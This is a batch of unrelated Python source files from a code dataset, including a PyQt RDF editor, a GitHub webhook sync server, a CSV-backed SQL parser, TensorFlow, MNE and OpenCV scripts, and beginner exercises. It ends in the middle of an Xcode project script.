QMessageBox.warning(self, \"RDFNavigator\", \"Cannot read file {0}:\\n{1}.\".format(fileName, file.errorString()))\n return False\n instr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.setText(instr.readAll())\n self.indicateUlrs()\n QApplication.restoreOverrideCursor()\n if self.isRdf:\n fileName = fileName.replace('.xml', '.rdf')\n self.setCurrentFile(fileName)\n self.textChanged.connect(self.documentWasModified)\n\n def loadXsd(self, fileName):\n self.isSchema = True\n self.loadXml(fileName)\n\n def loadRdf(self, fileName):\n tools = self.manager.getConfig('rdf_tools', '')\n plugins = self.manager.getConfig('rdf_plugins', '')\n thread = RDFNavigatorTransformThread(fileName=fileName, direction='rdf2xml', rdf_tools=tools, rdf_plugins=plugins)\n thread.rdf2xml_transform_done.connect(self.loadXml)\n thread.transform_output.connect(self.output_message)\n thread.run()\n\n def saveRdf(self, fileName):\n fd, tempFile = tempfile.mkstemp(suffix='.xml', prefix='temp')\n os.close(fd)\n self.saveXml(tempFile)\n self.setCurrentFile(fileName)\n tools = self.manager.getConfig('rdf_tools', '')\n plugins = self.manager.getConfig('rdf_plugins', '')\n thread = RDFNavigatorTransformThread(fileName=tempFile, orig_file_name=fileName, direction='xml2rdf', rdf_tools=tools, rdf_plugins=plugins)\n thread.rdf2xml_transform_done.connect(self.postSaveRdf)\n thread.run()\n\n def postSaveRdf(self, originalFileName, fileName):\n os.rename(fileName, originalFileName)\n\n def saveXml(self, fileName):\n file = QFile(fileName)\n\n if not file.open(QFile.WriteOnly | QFile.Text):\n QMessageBox.warning(self, \"RDF Navigator\", \"Cannot write file %s:\\n%s.\" % (fileName, file.errorString()))\n return False\n outstr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n outstr << self.text()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n\n def validateDocument(self):\n \"\"\"TODO: Source schema needs to be attached \"\"\"\n schemaPath = self.manager.getConfig('rdf_schemas', '')\n schema = RDFNavigatorXmlSchema()\n schema.validation_message.connect(self.parent.output_message)\n schema.setSchemaPath(os.path.join(schemaPath, 'RdfMain.xsd'))\n schema.validateDocument(self.text())\n\n def contextMenuEvent(self, e):\n menu = self.createBasicContextMenu()\n validateDocAction = menu.addAction(\"Validate document\", self.validateDocument)\n action = menu.exec_(self.mapToGlobal(e.pos()))\n\nclass RDFNavigatorSchemaChild(RDFNavigatorXmlChild):\n def __init__(self, parent=None):\n super(RDFNavigatorSchemaChild, self).__init__(parent)\n\n\nclass RDFNavigatorTemplateChild(RDFXmlTemplateEditor, RDFNavigatorChildBase):\n sequenceNumber = 1\n\n\n def __init__(self, parent=None):\n super(RDFNavigatorTemplateChild, self).__init__(parent)\n self.marker_added.connect(self.createBookmark)\n self.marker_deleted.connect(self.deleteBookmark)\n\n def newFile(self):\n self.isUntitled = True\n self.curFile = \"template%d.xml\" % RDFNavigatorTemplateChild.sequenceNumber\n RDFNavigatorTemplateChild.sequenceNumber += 1\n self.setWindowTitle(self.curFile + '[*]')\n self.textChanged.connect(self.documentWasModified)\n\n def loadFile(self, fileName):\n self.loadTemplate(fileName)\n return True\n\n def saveFile(self, fileName):\n self.saveTemplate(fileName)\n\n def loadTemplate(self, fileName):\n file = QFile(fileName)\n if not file.open(QFile.ReadOnly | QFile.Text):\n QMessageBox.warning(self, \"RDFNavigator\", \"Cannot read temlate file {0}:\\n{1}.\".format(fileName, file.errorString()))\n return False\n instr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.setText(instr.readAll())\n self.indicateAll()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n def saveTemplate(self, fileName):\n file = QFile(fileName)\n\n if not file.open(QFile.WriteOnly | QFile.Text):\n QMessageBox.warning(self, \"RDF Navigator\", \"Cannot write template file %s:\\n%s.\" % (fileName, file.errorString()))\n return False\n outstr = QTextStream(file)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n outstr << self.text()\n QApplication.restoreOverrideCursor()\n self.setCurrentFile(fileName)\n\n","sub_path":"rdfnavigatorchildren.py","file_name":"rdfnavigatorchildren.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"65033048","text":"import os\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\nfrom train import input_data\n\n\ndef eval_method(net1, net2):\n d = tf.sqrt(tf.reduce_sum(tf.pow(net1 - net2, 2), 1, keep_dims=True))\n thres = tf.constant(0.2)\n return tf.cast(tf.greater(d, thres), tf.int32)\n\n\nif __name__ == '__main__':\n test_dir = './Pair_data'\n logdir = './logs_test'\n ckpt_dir = './checkpoints/'\n ckpt_path = './checkpoints/model.ckpt-2000'\n tf.logging.set_verbosity(tf.logging.DEBUG)\n num_evals = 1\n img1_batch, img2_batch, label_batch = input_data(test_dir, 100, convert_to_one_hot=False)\n\n batch_queue = slim.prefetch_queue.prefetch_queue(\n [img1_batch, img2_batch, label_batch], capacity=2)\n images1, images2, labels = batch_queue.dequeue()\n label_batch = tf.cast(label_batch, dtype=tf.float32)\n saver = tf.train.Saver()\n predictions = eval_method(net1, net2)\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n # \"accuracy\": slim.metrics.accuracy(predictions, labels),\n # \"mse\": slim.metrics.mean_squared_error(predictions, labels),\n # })\n\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n # 'accuracy': slim.metrics.accuracy(predictions, labels),\n # # 'precision': slim.metrics.precision(predictions, labels),\n # # 'recall': slim.metrics.recall(mean_relative_errors, 0.3),\n # })\n\n # summary_ops = []\n # for metric_name, metric_value in names_to_values.iteritems():\n # op = tf.summary.scalar(metric_name, metric_value)\n # op = tf.Print(op, [metric_value], metric_name)\n # summary_ops.append(op)\n\n acc = slim.metrics.accuracy(predictions, labels)\n\n # slim.get_or_create_global_step()\n\n # slim.evaluation.evaluation_loop(\n # '',\n # ckpt_dir,\n # logdir,\n # num_evals=num_evals,\n # eval_op=acc,\n # # eval_op=acc,\n # # summary_op=tf.contrib.deprecated.merge_summary(summary_ops),\n # # summary_op=tf.summary.merge(summary_ops),\n # eval_interval_secs=60)\n\n with tf.Session() as sess:\n saver.restore(sess, ckpt_path)\n sess.run(tf.global_variables_initializer())\n\n coord = tf.train.Coordinator()\n # 使用start_queue_runners 启动队列填充\n threads = tf.train.start_queue_runners(sess, coord)\n\n try:\n while not coord.should_stop():\n print\n '************'\n # 获取每一个batch中batch_size个样本和标签\n accuracy = sess.run(acc)\n print(accuracy)\n except tf.errors.OutOfRangeError: # 如果读取到文件队列末尾会抛出此异常\n print(\"done! now lets kill all the threads……\")\n finally:\n # 协调器coord发出所有线程终止信号\n coord.request_stop()\n print('all threads are asked to stop!')\n coord.join(threads) # 把开启的线程加入主线程,等待threads结束\n print('all threads are stopped!')\n\n\n\n","sub_path":"Discrimination_Net/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"169732712","text":"import mne\nfrom mne.datasets import spm_face\nfrom mne.decoding import GeneralizationAcrossTime\nfrom gat.classifiers import scaled_clf, SVC_decision, scorer_auc\n\n# Preprocess data\ndata_path = spm_face.data_path()\nraw_fname = data_path + '/MEG/spm/SPM_CTF_MEG_example_faces%d_3D_raw.fif'\nevents_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'\n\nraw = mne.io.Raw(raw_fname % 1, preload=True) # Take first run\npicks = mne.pick_types(raw.info, meg=True, exclude='bads')\nraw.filter(1, 45, method='iir')\n\nevents = mne.find_events(raw, stim_channel='UPPT001')\nevent_id = {\"faces\": 1, \"scrambled\": 2}\ntmin, tmax = .1, 0.3\ndecim = 16 # decimate to make the example faster to run\nepochs = mne.Epochs(raw, events, event_id, tmin, tmax, proj=True,\n picks=picks, baseline=None, preload=True,\n reject=dict(mag=1.5e-12), decim=decim, verbose=False)\n\n# decoder\nimport sys\nSVM_scaled = scaled_clf(clf=SVC_decision)\nsetattr(sys.modules[__name__], 'SVM_scaled', SVM_scaled)\ngat = GeneralizationAcrossTime(n_jobs=-1, clf=SVM_scaled())\ngat.fit(epochs)\ngat.score(epochs, scorer=scorer_auc)\ngat.plot()\n","sub_path":"sandbox/decoding/rescale_gat.py","file_name":"rescale_gat.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"619809638","text":"# Seminar Uebung 01\n\nimport math\n\ndef ganzzahlDivision(num1, num2):\n print(\"\\nWir befinden uns in der Fkt: ganzzahlDivision(): \\n\")\n _temp = num1 / num2\n _temp = math.floor(_temp)\n print(\" \", num1, \"//\" , num2, \"=\", _temp, \" \\n\")\n\ndef DivReal(num1, num2):\n print(\"\\nWir befinden uns in der Fkt: DivReal(): \\n\")\n _temp = 0;\n\n if num1 < 0 or num2 < 2:\n _temp = abs(num1) / abs(num2)\n _temp = math.floor(_temp) * (-1)\n else:\n _temp = num1 / num2\n\n print(\" \", num1, \"//\" , num2, \"=\", _temp, \" \\n\")\n\ndef ModuloReal(num1, num2):\n print(\"\\nWir befinden uns in der Fkt: ModuloReal(): \\n\")\n _temp = 0;\n\n if num1 < 0 or num2 < 2:\n _temp = (abs(num1) % abs(num2)) * (-1)\n else:\n _temp = num1 % num2\n\n print(\" \", num1, \"%\" , num2, \"=\", _temp, \" \\n\")\n\ndef main():\n print(\"In der main(): \\n\")\n # Wie lautet das Ergebnis von -10//3\n print(\"Ganzzahl Divison: \")\n myVar = -10//3 # = -4\n print(\" -10 // 3 = \", myVar)\n\n myVar = 10//3\n print(\" 10 // 3 = \", myVar)\n\n print(\"\\nModulo: \")\n myVar = -10 % 3; # = 2\n print(\" -10 % 3 = \", myVar)\n\n myVar = 10 % 3\n print(\" 10 % 3 = \", myVar)\n\n ganzzahlDivision(-10, 3)\n DivReal(-10, 3)\n ModuloReal(-10, 3)\n\nmain()\n ","sub_path":"Seminar/Uebung01/Uebung01.py","file_name":"Uebung01.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"316745437","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport json as jsn\nimport socket\nimport threading\nimport http.server\nimport requests\nimport os\nimport sys\nimport base64\nimport datetime\nimport argparse\n\n\ndef get_file(file_hash, repo_hash):\n repo = config[repo_hash]['source']\n file = config[repo_hash]['files'][file_hash]['source']\n url = 'https://raw.githubusercontent.com/' + repo + '/master/' + file\n\n response = requests.get(url)\n if response.status_code == 200:\n return response.content\n else:\n return False\n\n\ndef get_hash(param):\n return hash(param) % ((sys.maxsize + 1) * 2)\n\n\ndef get_sha(file, repo, branch):\n url = 'https://api.github.com/repos/' + repo + '/contents/' + file + '?ref=' + branch\n response = requests.get(url).json()\n if 'sha' in response:\n return response['sha']\n else:\n return False\n\n\ndef logic_fix(file):\n for path in file['paths']:\n for element in file['paths'][path]:\n file['paths'][path][element]['operationId'] = file['paths'][path][element]['summary']\n return file\n\n\ndef parse_request_line(request_line):\n request_line = request_line.split('HTTP')[0].strip()\n method = request_line.split('/')[0].strip()\n cmd = request_line.split('/')[1].strip().split('?')[0]\n param = dict()\n if cmd in ['sync', 'config']:\n if len(request_line.split('?')) > 1:\n for element in request_line.split('?')[1].split('&'):\n if element.split('=')[0] in ['repo', 'token']:\n param[element.split('=')[0]] = element.split('=')[1]\n\n if method == 'GET' and cmd in cmd_get_rl:\n return cmd, param\n if method == 'POST' and cmd in cmd_post_rl:\n return cmd, param\n\n return False, None\n\n\ndef prepare_list(request, repo_hash):\n to_sync = list()\n if not request:\n for i in config[repo_hash]['files']:\n to_sync.append(config[repo_hash]['files'][i]['source'])\n else:\n commits = request['commits']\n commits.append(request['head_commit'])\n cfg_files = list()\n for i in config[repo_hash]['files']:\n cfg_files.append(config[repo_hash]['files'][i]['source'])\n for i in commits:\n if 'added' in i:\n for j in i['added']:\n if j in cfg_files:\n to_sync.append(get_hash(j))\n if 'modified' in i:\n for j in i['modified']:\n if j in cfg_files:\n to_sync.append(get_hash(j))\n to_sync = list(set(to_sync))\n\n if len(to_sync) > 0:\n return to_sync\n else:\n return False\n\n\ndef sync(sync_list, repo_hash):\n trg_repo = config[repo_hash]['target']\n\n for src_file in sync_list:\n data = dict()\n data['committer'] = dict()\n data['committer']['name'] = user\n data['committer']['email'] = email\n data['message'] = 'autosync'\n\n trg_file = config[repo_hash]['files'][src_file]['target']\n\n if config[repo_hash]['files'][src_file]['transform']:\n response = transform(src_file, repo_hash)\n response = logic_fix(jsn.loads(response.decode('utf-8')))\n response = jsn.dumps(response, indent=2)\n else:\n response = get_file(src_file, repo_hash)\n response = response.decode()\n if response:\n data['content'] = base64.b64encode(bytes(response, 'utf-8')).decode()\n\n for branch in dst_branches:\n data['branch'] = 'refs/heads/' + branch\n sha = get_sha(trg_file, trg_repo, branch)\n if sha:\n data['sha'] = sha\n\n url_trg = 'https://api.github.com/repos/' + trg_repo + '/contents/' + trg_file + \\\n '?access_token=' + token_github\n data_json = jsn.dumps(data)\n response = requests.put(url_trg, data=data_json, headers={'Content-Type': 'application/json'}).json()\n\n if 'commit' not in response:\n return {'message': 'GitHub commit failed'}, 500\n\n else:\n return {'message': 'APIMatic transformation failed'}, 500\n\n return {'message': 'Synchronization succeeded'}, 200\n\n\ndef transform(file_hash, repo_hash):\n if repo_hash != test_repo:\n repo = config[repo_hash]['source']\n else:\n repo = repo_hash\n if file_hash != test_file:\n file = config[repo_hash]['files'][file_hash]['source']\n else:\n file = file_hash\n\n description = 'https://raw.githubusercontent.com/' + repo + '/master/' + file\n url = 'https://apimatic.io/api/transform?format=' + dst_format + '&descriptionUrl=' + description\n\n event.acquire()\n while True:\n response = requests.get(url, headers={'Authorization': 'X-Auth-Key ' + token_apimatic})\n if response.status_code == 200:\n break\n if response.status_code == 400:\n break\n if response.status_code == 401:\n break\n event.release()\n\n if response.status_code != 200:\n return False\n else:\n return response.content\n\n\nclass Handler(http.server.BaseHTTPRequestHandler):\n\n def do_GET(self):\n cmd, param = parse_request_line(self.requestline)\n if not cmd:\n message = {'message': 'Request not found'}\n self.reply(message, code=404)\n return\n\n if cmd == 'ping':\n message = {'message': 'Pong'}\n self.reply(message, silent=True, cmd=cmd)\n return\n\n if cmd == 'version':\n message = {'message': version}\n self.reply(message, cmd=cmd)\n return\n\n if cmd == 'config':\n status = False\n if 'token' in param:\n if param['token'] == token:\n message = {'message': config}\n self.reply(message, cmd=cmd)\n else:\n status = True\n else:\n status = True\n\n if status:\n message = {'message': 'Access denied'}\n self.reply(message, code=401, cmd=cmd)\n return\n\n if cmd == 'apimatic':\n if transform(test_file, test_repo):\n message = {'message': 'Test succeeded'}\n self.reply(message, cmd=cmd)\n else:\n message = {'message': 'Test failed'}\n self.reply(message, code=500, cmd=cmd)\n return\n\n def do_POST(self):\n cmd, param = parse_request_line(self.requestline)\n repo = None\n body = None\n\n if not cmd:\n cmd = self.headers.get('X-GitHub-Event')\n\n if not cmd:\n message = {'message': 'Request not found'}\n self.reply(message, code=400)\n return\n\n if cmd not in cmd_post:\n message = {'message': 'Request not found'}\n self.reply(message, code=404, cmd=cmd)\n return\n\n if cmd in cmd_post_hr_ignored:\n message = {'message': 'Request ignored'}\n self.reply(message, cmd=cmd)\n return\n\n if cmd not in cmd_post_rl:\n content_length = int(self.headers.get('content-length'))\n\n if content_length == 0:\n message = {'message': 'Length Required'}\n self.reply(message, code=411, cmd=cmd)\n return\n\n body = self.rfile.read(content_length).decode('utf-8')\n\n try:\n body = jsn.loads(body)\n except ValueError:\n message = {'message': 'Unsupported media type'}\n self.reply(message, code=400, cmd=cmd)\n return\n\n if 'repository' in body:\n if 'full_name' in body['repository']:\n repo = body['repository']['full_name']\n else:\n if 'repo' in param:\n repo = param['repo']\n\n if not repo:\n message = {'message': 'Repository not defined'}\n self.reply(message, code=400, cmd=cmd)\n return\n\n repo_hash = hash(repo) % ((sys.maxsize + 1) * 2)\n\n if repo_hash not in config:\n message = {'message': 'Repository not found'}\n self.reply(message, code=404, cmd=cmd, repo=repo)\n return\n\n if cmd == 'ping':\n message = {'message': 'Pong'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n\n if cmd == 'sync':\n sync_list = prepare_list(None, repo_hash)\n message, code = sync(sync_list, repo_hash)\n self.reply(message, code=code, cmd=cmd, repo=repo)\n return\n\n if cmd == 'push':\n if body['ref'].split('/')[:3][2] != 'master':\n message = {'message': 'Branch not master, ignored'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n\n sync_list = prepare_list(body, repo_hash)\n if not sync_list:\n message = {'message': 'Files in commit not match config'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n else:\n message, code = sync(sync_list, repo_hash)\n self.reply(message, code=code, cmd=cmd, repo=repo)\n return\n\n message = {'message': 'Hook not found'}\n self.reply(message, code=404, cmd=cmd, repo=repo)\n return\n\n def log_message(self, format, *args):\n return\n\n def reply(self, message=None, silent=False, code=200, cmd=None, repo=None):\n self.send_response(code)\n self.send_header('content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(jsn.dumps(message, indent=2) + '\\n', 'utf8'))\n\n if not silent:\n message['code'] = code\n if self.headers.get('X-Real-IP'):\n message['ip'] = self.headers.get('X-Real-IP')\n else:\n message['ip'] = self.client_address[0]\n message['request'] = self.requestline\n message['date'] = datetime.datetime.now().isoformat()\n if cmd:\n message['cmd'] = cmd\n if repo:\n message['repo'] = repo\n if self.headers.get('X-GitHub-Delivery'):\n message['gh'] = self.headers.get('X-GitHub-Delivery')\n print(jsn.dumps(message, indent=2))\n return\n\n\nclass Thread(threading.Thread):\n def __init__(self, i):\n threading.Thread.__init__(self)\n self.i = i\n self.daemon = True\n self.start()\n\n def run(self):\n httpd = http.server.HTTPServer(address, Handler, False)\n\n httpd.socket = sock\n httpd.server_bind = self.server_close = lambda self: None\n\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--ip', dest=\"ip\", default='0.0.0.0', help='ip address (default: 0.0.0.0)', action=\"store\")\n parser.add_argument('--port', dest=\"port\", default=8000, help='port (default: 8000)', action=\"store\")\n parser.add_argument('--config', dest='config_path', default='/opt/config.json',\n help='path to config file (default: /opt/config.json)', action=\"store\")\n parser.add_argument('--user', dest='user', default='fw-ops', help='github user (default: fw-ops)',\n action=\"store\")\n parser.add_argument('--email', dest='email', default='fiware.bot@gmail.com',\n help='github user email (default: fiware.bot@gmail.com)', action=\"store\")\n parser.add_argument('--threads', dest='threads', default=4, help='threads to start (default: 4)',\n action=\"store\")\n parser.add_argument('--socks', dest='socks', default=2, help='socks to start (default: 2)', action=\"store\")\n\n args = parser.parse_args()\n\n user = args.user\n email = args.email\n\n address = (args.ip, args.port)\n version_path = os.path.split(os.path.abspath(__file__))[0] + '/version'\n test_file = 'api1.apib'\n test_repo = 'FIWARE-Tests/apispectransformer-source'\n\n event = threading.BoundedSemaphore(1)\n\n cmd_get_rl = ['ping', 'config', 'version', 'apimatic']\n cmd_post_rl = ['sync']\n cmd_post_hr = ['ping', 'push']\n cmd_post_hr_ignored = ['check_run', 'check_suite', 'commit_comment', 'deployment', 'deployment_status', 'status',\n 'gollum', 'installation', 'installation_repositories', 'issue_comment', 'issues', 'label',\n 'marketplace_purchase', 'member', 'membership', 'milestone', 'organization', 'org_block',\n 'page_build', 'project_card', 'project_column', 'project', 'public', 'pull_request', 'fork',\n 'pull_request_review_comment', 'pull_request_review', 'repository', 'watch', 'team_add',\n 'repository_vulnerability_alert', 'team', 'create', 'delete', 'release']\n cmd_post = cmd_post_rl + cmd_post_hr + cmd_post_hr_ignored\n\n if 'TOKEN_GITHUB' in os.environ:\n token_github = os.environ['TOKEN_GITHUB']\n else:\n print(jsn.dumps({'message': 'TOKEN_GITHUB not found', 'code': 500, 'cmd': 'start'}, indent=2))\n token_github = None\n sys.exit(1)\n\n if 'TOKEN_APIMATIC' in os.environ:\n token_apimatic = os.environ['TOKEN_APIMATIC']\n else:\n print(jsn.dumps({'message': 'TOKEN_APIMATIC not found', 'code': 500, 'cmd': 'start'}, indent=2))\n token_apimatic = None\n sys.exit(1)\n\n if 'TOKEN' in os.environ:\n token = os.environ['TOKEN']\n else:\n print(jsn.dumps({'message': 'TOKEN not found', 'code': 404, 'cmd': 'start'}, indent=2))\n token = None\n\n if not os.path.isfile(args.config_path):\n print(jsn.dumps({'message': 'Config file not found', 'code': 500, 'cmd': 'start'}, indent=2))\n config_file = None\n sys.exit(1)\n try:\n with open(args.config_path) as f:\n cfg = jsn.load(f)\n except ValueError:\n print(jsn.dumps({'message': 'Unsupported config type', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n version = dict()\n if not os.path.isfile(version_path):\n print(jsn.dumps({'message': 'Version file not found', 'code': 500, 'cmd': 'start'}, indent=2))\n version_file = None\n sys.exit(1)\n try:\n with open(version_path) as f:\n version_file = f.read().split('\\n')\n version['build'] = version_file[0]\n version['commit'] = version_file[1]\n except IndexError:\n print(jsn.dumps({'message': 'Unsupported version file type', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n print(jsn.dumps({'message': 'Loading config', 'code': 200, 'cmd': 'start'}, indent=2))\n\n try:\n dst_format = cfg['format']\n dst_branches = cfg['branches']\n config = dict()\n for r in cfg['repositories']:\n repository = get_hash(r['source'])\n config[repository] = dict()\n config[repository]['source'] = r['source']\n config[repository]['target'] = r['target']\n config[repository]['files'] = dict()\n for f in r['files']:\n fl = get_hash(f['source'])\n config[repository]['files'][fl] = dict()\n config[repository]['files'][fl]['source'] = f['source']\n config[repository]['files'][fl]['target'] = f['target']\n config[repository]['files'][fl]['transform'] = f['transform']\n except KeyError:\n print(jsn.dumps({'message': 'Config is not correct', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n if len(config) == 0:\n print(jsn.dumps({'message': 'Repositories list is empty', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n if len(dst_branches) == 0:\n print(jsn.dumps({'message': 'Branches not defined', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(address)\n sock.listen(args.socks)\n\n [Thread(i) for i in range(args.threads)]\n\n print(jsn.dumps({'message': 'Service started', 'code': 200}, indent=2))\n\n while True:\n time.sleep(9999)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":16384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"152242232","text":"# Program: Algotimo215_Enq54.py\n# Author: Ramon R. Valeriano\n# Description: \n# Developed: 08/04/2020 - 11:16\n# Updated:\n\ntax_boy = 11\ntax_girl = 12\nvalue_girl = 0\nvalue_boy = 0\nresult = 0\ncont_family = 0\n\nwhile True:\n family = input(\"Entet with the name of the family: \")\n family = family.upper()\n if family == \"@\":\n break\n print(\"The family have Children: \")\n answer = input(\"Enter wiht Yes or Not: \")\n answer = answer.upper()\n \n if answer == \"YES\":\n boy = int(input(\"Enter with the quantity of Boys: \"))\n if boy>0:\n value_boy=tax_boy*boy\n else:\n value_boy = 0\n \n girl = int(input(\"Enter with the quantity of girl: \"))\n if girl>0:\n value_girl=tax_girl*girl\n else:\n value_girl = 0\n print()\n print(family)\n print(value_boy)\n print(value_girl)\n print()\n result = value_girl + value_boy\n cont_family+=1\n \n elif answer == \"NOT\":\n result = value_girl + value_boy\n cont_family+=1\n\n else:\n print(\"Invalid Option!\")\n \nprint()\nprint(cont_family)\nprint(value_girl)\nprint(value_boy)\n","sub_path":"Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 4/Exercicios 4a/Algotimo215_Enq54.py","file_name":"Algotimo215_Enq54.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147818799","text":"#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\nimport timeit\n\nfont = cv2.FONT_HERSHEY_DUPLEX\n\n# Image parameters\nw = 1280\nh = 720\n# c = 1 # monochrome\nc = 3 # color\n\n# Timing\nN = 10\nk = 0\nt = timeit.default_timer()\nt_prev = 0\nfps_imshow = 0\nfps = 0\ncv2.namedWindow('window',cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_OPENGL)\nwhile(True):\n k += 1\n\n static = np.random.randint(0,255,[h,w,c],np.uint8)\n\n # timing\n if(k % N == 0):\n t_prev = t\n t = timeit.default_timer()\n fps = N/(t-t_prev)\n\n cv2.putText(static, \"fps display: {0:.1f}\".format(fps), (0, 30), font, 1, (0, 0, 255), 1, cv2.LINE_AA)\n cv2.putText(static, \"fps imshow: {0:.1f}\".format(fps_imshow), (0, 60), font, 1, (0, 255, 0), 1, cv2.LINE_AA)\n\n t_start = timeit.default_timer()\n cv2.imshow('window',static)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n t_stop = timeit.default_timer()\n fps_imshow = 1/(t_stop-t_start)\n\ncv2.destroyAllWindows()\n\n# Hack not to \"hang\" the window in *nix systems (Linux,Mac)\ncv2.waitKey(1)","sub_path":"video_static_opengl.py","file_name":"video_static_opengl.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"158428751","text":"import re\nimport time\nimport pandas as pd\n\n\nclass SQLQuery(object):\n def __init__(self, query='', testing=False):\n super(SQLQuery, self).__init__()\n self.query = ''\n self.table = ''\n self.columns = []\n self.as_columns = []\n self.predicate = ''\n self.select_case = ''\n self.from_case = ''\n self.where_case = ''\n self.testing = testing\n\n if query:\n self.parse_query(query)\n\n # run the sql query\n def run(self):\n try:\n # FROM\n # open file and select columns\n data = pd.read_csv(self.table)\n\n if self.testing:\n start_time = time.time()\n\n # WHERE\n # predicate is exist?\n if self.predicate:\n column = self.predicate[0]\n if self.predicate[0] not in data.columns:\n raise KeyError('{} key not exist'.format(column))\n if 'AND' in self.predicate:\n eval_str = self.__generate_eval_str__(' AND ', '&')\n elif 'OR' in self.predicate:\n eval_str = self.__generate_eval_str__(' OR ', '|')\n else:\n cond = self.predicate[1]\n value = self.predicate[2]\n value = '\\'{}\\''.format(value) if value.isalpha() else value\n eval_str = 'data[data[column] {} {}]'.format(cond, value)\n eval_str = eval_str.replace('=', '==').replace('<>', '!=')\n data = eval(eval_str)\n\n # SELECT\n # select columns, as columns\n if self.columns:\n if not len(self.columns) == 1 and not self.columns[0] == '*':\n data = data[self.columns]\n data.columns = self.as_columns\n elif not self.columns[0] == '*':\n raise ValueError('Invalid columns')\n if self.testing:\n print('Query: {}'.format(self.query))\n print('Rows: {}'.format(data.shape[0]))\n print('Elapsed time: {:.5f} sec\\n'.format(time.time() - start_time))\n else:\n data.to_csv('out.csv', sep=';', index=False)\n except (KeyError, OSError, ValueError) as e:\n print('Error: {}'.format(e))\n\n # split and extract query data\n def parse_query(self, query):\n self.table = ''\n self.columns = []\n self.as_columns = []\n self.predicate = ''\n self.select_case = ''\n self.from_case = ''\n self.where_case = ''\n self.query = self.__split__(query)\n self.__extract__()\n\n def __generate_eval_str__(self, cond, repl):\n eval_str = []\n predicates = ' '.join(self.predicate).split(cond)\n for predicate in predicates:\n split_predicate = predicate.split()\n column = split_predicate[0]\n value = split_predicate[2]\n value = '\\'{}\\''.format(value) if value.isalpha() else value\n eval_str.append('(data[\\'{}\\'] {} {})'.format(column, split_predicate[1], value))\n eval_str.append(cond.strip())\n eval_str = ' '.join(eval_str)[:-3]\n eval_str = eval_str.replace('=', '==').replace('<>', '!=').replace(cond.strip(), repl)\n eval_str = 'data[{}]'.format(eval_str)\n return eval_str\n\n # split query to cases (select, from, where)\n def __split__(self, query):\n matches = re.findall(r'SELECT(\\s.+)FROM(\\s.+)WHERE(\\s.+)', query)\n if len(matches) > 0:\n from_index, where_index = query.find('FROM'), query.find('WHERE')\n self.select_case = query[:from_index].strip()\n self.from_case = query[from_index:where_index].strip()\n self.where_case = query[where_index:].strip()\n return query\n matches = re.findall(r'SELECT(\\s.+)FROM(\\s.+)', query)\n if len(matches) > 0:\n from_index = query.find('FROM')\n self.select_case = query[:from_index].strip()\n self.from_case = query[from_index:].strip()\n return query\n raise ValueError('Invalid SQL query')\n\n # extract data from cases\n def __extract__(self):\n self.__extract_columns__()\n self.__extract_predicate__()\n self.table = self.from_case[4:].strip() + '.csv'\n\n def __extract_columns__(self):\n cols = self.select_case[6:].split(',')\n self.columns = [column.strip() for column in cols if column]\n for column in self.columns:\n self.as_columns.append(column.split(' AS ')[1].strip() if ' AS ' in column else column)\n self.columns = [column.split(' AS ')[0].strip() for column in self.columns]\n\n def __extract_predicate__(self):\n self.predicate = self.where_case[5:].strip()\n matches = re.findall(r'([A-z]+)\\s+(!=|<>|>|<|=)\\s+([A-z0-9]+)', self.predicate)\n self.predicate = self.predicate.split() if len(matches) > 0 else ''\n","sub_path":"sql_subset.py","file_name":"sql_subset.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"501433014","text":"import os\nimport shutil\nfrom sys import argv\nfrom mod_pbxproj import XcodeProject\nimport plistlib\n\npath = argv[1]\nfileToAddPath = argv[2]\nappId = argv[3]\napiKey 